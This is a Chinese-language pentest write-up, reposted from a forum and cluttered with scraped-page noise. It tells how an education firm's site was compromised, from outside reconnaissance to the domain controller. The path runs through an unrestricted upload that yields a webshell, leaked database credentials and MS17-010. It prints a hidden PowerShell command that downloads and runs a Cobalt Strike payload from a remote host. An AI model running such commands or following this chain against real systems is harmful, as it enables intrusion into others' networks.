|
. b# W) X' y$ M; R# T 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
$ R2 |# z# b5 J8 W 8 k4 V6 v p6 R! X' C; N, n
9 G% X6 b3 Y1 C! F: M9 J9 b* h
) z' Y; U' {. G1 g9 l
" h) g' i5 y) ], F9 f x
6 D. a( F5 E' x 正文$ t6 @8 J; |+ A. n7 X- N
( _, H, L0 S$ W9 p9 \
+ q$ o( j& {: ?: I
* Y; ]2 s9 R6 }% f4 w
/ ~( D1 h8 k R: g3 S0 z% n- J8 | p, z( G }2 j1 j T8 f* Z' d. A6 @
目标:www.xxxx.com(一家教育机构) " Z1 Z8 k9 y7 o" g& E
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能( t* Q! T/ ^. {* g8 ?. W6 Z
8 V$ r$ ~, v2 W# y# O4 q' f" C, W' [3 {
9 T& b( o& S! G$ V
. @, u% E! P5 C7 d
% o, L$ q% e2 @: X 进行了简单的信息搜集
y2 d; c, p3 ^) y% s, [6 A
2 @, j/ t/ e5 [! j4 a6 |: v' \% C7 G! t h3 `6 v4 M# O* ^
3 d3 a4 M7 {7 D9 s9 r' c! Y' s; b; U# j- o- e
子域名搜集
+ Z6 b4 K! B0 O, E/ W7 G 3 A* w1 b" r# k
$ \. u6 g( m9 G8 L; e
8 N1 X4 D x( Q0 B
) [; H. Z" i( S. N! ~: M1 Y/ N# q2 N5 j: ^
fofa找资产 # \! K# ]3 [5 j6 S2 ?* a
' I$ L6 g, I0 f! Q7 ~1 a4 _
2 ]9 P5 r) ^# Q' K
0 J1 P; M& t0 }6 z
7 |8 P6 k# v! ^9 s& G
/ Z4 [% H# C; D* b - T* d" H5 k4 r# y2 I S
; a% @8 {0 ~" A; H6 ^' u# E
一共七个资产。去重之后只有两个。
- d9 _1 }( z% V- Q2 u 8 {1 J2 y, d4 p5 U4 N; x
7 j1 N z3 o1 i* {- |. g
$ I9 f) S; N% [' D4 _: _' q
: [4 H# ^- X1 l. k 目录探测
: |; O2 d- H) }/ ]9 b) d" F 5 s1 y# A5 _( m. C3 e# Q' `
( W0 ~% O" X6 z# N7 k ' R0 p) q& `6 e9 {
3 F# K. d3 ~$ W
H( U$ G5 o3 ?: E' P6 | 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 - I$ a* R+ H# ?1 ^2 p
! j2 J% C0 V* j
2 n: K" V7 s& l# K! K; y
; p8 C8 r3 B$ w
' r2 Q# h$ U7 M& V# V* ~6 j# ~ 我又尝试了通过修改返回包来绕过登录界面
& s( T5 Z; O8 I; l
% V/ m% c# l: X8 z
) K" Q& I) w) W! e& w* H+ |$ @6 \ 0 i1 E$ E. F$ s
$ A e$ j1 _) P8 A" i, @0 W& k
1 p# @, o% d9 O! K9 M 还是不行,尝试注入无果
9 q3 T) m( I7 I/ I# B" a
/ u; W, G% H- M& W/ n: N5 a* z" E2 U, j" [/ _
& w b$ S# [/ j- c4 x
0 N, N: n0 b3 i# r8 n6 t. X7 V6 t- @1 @" W, u" u; ^: J
不过我目录探测出了一处Spring信息泄露
; X7 X, { A& S6 J3 t: L! c7 O+ S% @ 9 K. |9 e6 x" {. I
4 J4 K5 W$ {( `) P. J 9 Y1 a( M1 t) k9 e! N7 ^/ L8 H
/ L8 k9 C9 G/ z1 _6 M , k: P4 ?% R! F% X
; ?" A) |8 D$ K$ a! O
! d4 X$ ]) H; E: x 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录! f% j" N( g6 W4 p8 u0 c
9 m: Q3 w7 q+ R* y8 e1 i: R6 O5 [) I
; c1 M. i5 {+ z7 R( q6 F 2 E$ x3 W+ d3 s4 Y. Y
1 ? l; _, E" f: j& b7 M$ k) ]
$ j/ s" `' y! Y1 i' s' Y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& h- E8 A" ~, Q
" D; U" c! L( f3 ?
5 I9 m' d. ^+ R/ Y% N8 m- y
" m% Y4 @: n s( m $ [0 P% x1 O( J, ]- K G
6 J8 N$ @) N! h. E! X# E! m' | 获取有些师傅到这一步就手机抓包电脑测了。( S2 Y" X3 V1 P) k( u8 M. F3 l3 g" F
0 O# @. o8 S+ m+ Q" G6 D+ K5 |) k9 A, [5 q0 e
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
$ m( J' d# u$ d1 l
( e) o/ d8 e2 N0 u4 g! c
. D0 W5 W6 H1 @0 | 其中在一个公众号发现了小程序,可以进行注册。
0 C$ ?' a2 M. s4 ]9 O- s$ l* e8 V
. {+ K& ]- Y! v v, ?( x2 S' l; I5 v) c9 f/ x1 r
看到了头像上传,尝试上传获取WebShell0 m: V s# N; {9 Q1 n9 G: _
! D' Z( o, o" |- B" P* P
$ I( F$ R8 P; x% [. N/ H/ V4 k1 n% ]
) K4 W+ R- l$ v! b V# D) T: ?2 C
% @9 X# O$ d+ T7 \2 F* G: ` C; a$ M" e
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 q3 E/ V+ g% i" W. l/ J
2 y, u6 F. Y5 P& c
; b8 T8 k7 u0 s3 k% i
! m4 [. q$ A$ ^7 Q. \* K
& ~2 v' n" D: G& J/ S
: A; y0 ?4 n' W4 \: h F4 D5 p 然后上了大马: A6 f+ U/ P/ o4 h
9 \/ D! H0 S7 `! \
& s' f3 k0 M2 e
/ i/ f f. `3 S( |2 [1 A , m1 ~. O. C" f! Y z
9 R% q2 c/ ` q, @1 ^
* {& J, ]: {- `$ ?/ X
4 B0 p7 O7 x, ?
% Z- i, N* }6 g8 _6 }2 | 通过翻找文件发现数据库账号密码
( H5 l2 N- U, l" K% g: n: J0 t* x # F, L% M5 @& r0 p: U( l
* U. s/ U' L9 h, |/ z4 u
- ~. t1 j2 p$ r$ \* ~7 Z: t ( j8 q9 w( m/ x
# K5 m. g" ^0 Q" U( q* P
--内网渗透/ X1 F) [3 C5 k1 u$ | c$ c
! f$ L+ }0 C" ^2 s( O8 H
2 d# `( z3 v: q6 l, M 直接通过powershell执行 cs上线( A* T! T7 t1 e5 |& _! Z6 |/ k
1 r; F# } u9 S2 D- M2 _% `. @9 |2 i. t
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 b* A8 D$ [- Y& s$ h& I# P
2 Q0 _. E _% l0 N1 X5 U- ~
/ L; [) a1 m: f7 D/ E0 Y0 F0 [
7 ]: x! w& n9 m6 j7 u8 F/ k
% h$ @% m6 U0 J3 \) u
% ]. j# q+ A. t) k) U 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
], T9 \ C8 ]3 g: G; q 6 n1 M7 i# T. z( u) Q: t' f4 ?; t' m
9 }6 n$ h3 {; V2 i9 u/ A : K5 @# {2 G. \" Z- P$ t
* M0 e( u( `" j6 ?) k, ~9 N9 c r5 d6 B0 j5 g) n6 g7 a% {0 F5 m& p
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 + L( Y( g# n+ X# j/ E! e
" `; x1 J" o4 h a# ~/ P. S; B q
5 A/ |; ^5 e( Q7 b) y4 B4 w$ ^5 n+ ]4 \% m3 }! @( P( g+ d% J
7 C; y; z4 e% k! ]! b# p' d4 z$ t! H9 y& z- M4 u' ^
% G# W- T' \3 L4 z0 _' N9 h: u& f . S, h; ]! m- q
T' v, q% s7 Z( R; {( O
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. @; {4 `& D" `
9 V% M- \' s/ Z
' r4 F: H& x7 c" y$ r4 L / v+ @. i8 R- Q! i% B
2 y9 {( N* o2 v- V' j2 l7 G
1 e* x) j6 w' M% v, @
9 }& A6 x3 G! a
7 I0 V7 o0 B! _9 _/ X7 P. `% s6 y+ p
/ g `- @% ^# |0 \- i9 O$ i* j : R/ [' [1 n2 K" A7 _- s' O
- v% T3 O% l- }& L) S& N2 O
$ {8 F/ d" u2 ^% }* Q
M6 [ X* o6 b0 s6 n' V
6 j6 a8 q' g9 c3 `" d
. W6 O" E* z1 X7 \ Q* E
. L( C7 m4 t4 w( H* D 小结9 l+ c" Z6 u& l$ C: U% c
: z. e5 o+ l( w. x# s4 q, u
# y1 [, A2 Y& K2 V( d* b 8 n S8 G/ z0 F, b
" [0 r8 h& I* l5 G; |
9 V" s( }0 {. X: _9 J1 Z 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' g, ^1 s$ q- ]. s 9 k( ?! v# D: j
8 q( t2 u K* N9 W
" e: {+ b6 c! I
/ \7 G6 Q0 X4 ?8 R- |* U. M1 w, b+ u( m2 M) d0 B8 t; t
- & X5 N9 _$ h8 ?9 b* d
" H% m3 X6 Z' ?. o# A
' w, z% i6 L0 r1 T6 t
-
4 L6 C; ]2 ?! ~( w. q3 I4 c6 U
: r& g" K4 z2 x5 m
+ B' V0 y# l: f6 h% f: w
; N3 K' b% A. j* U, q8 `
9 J- R d6 V1 e. N# ` 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
" U Z& X+ ~( Y' @3 \ 5 \6 d8 f/ F) T& H& U, E
# k+ ]" r7 n. V* \
4 \& b; G0 N3 z! F" Q |